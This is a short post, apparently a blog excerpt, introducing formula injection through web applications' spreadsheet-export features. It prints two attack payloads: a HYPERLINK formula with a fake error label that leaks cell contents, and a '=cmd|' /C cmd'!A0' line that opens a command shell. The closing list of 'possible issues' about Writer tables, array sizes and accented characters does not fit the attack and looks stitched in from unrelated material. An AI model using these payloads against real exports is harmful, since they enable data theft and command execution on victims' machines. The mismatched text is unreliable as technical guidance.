Formula Injection, a technique for exploiting ‘Export to Spreadsheet’ functionality

 This post introduces Formula Injection, a technique for exploiting ‘Export to Spreadsheet’ functionality in web applications to attack users and steal spreadsheet contents. It also details a command injection exploit for Apache OpenOffice and LibreOffice that can be delivered using this technique.

   =HYPERLINK(""&A1&A2, "Error: please click for further information")
=cmd|' /C cmd'!A0

Possible Issues for which the attack might not work:

  • Excel does not have this function.
  • When using an array to return data, the size of the array is fixed on first calculation. If for example the number of lines in a Writer table or section changes, the array size in Calc does not change.
  • On the majority of platforms, accented characters are treated wrong.
  • There are alternative ways to link to external data.
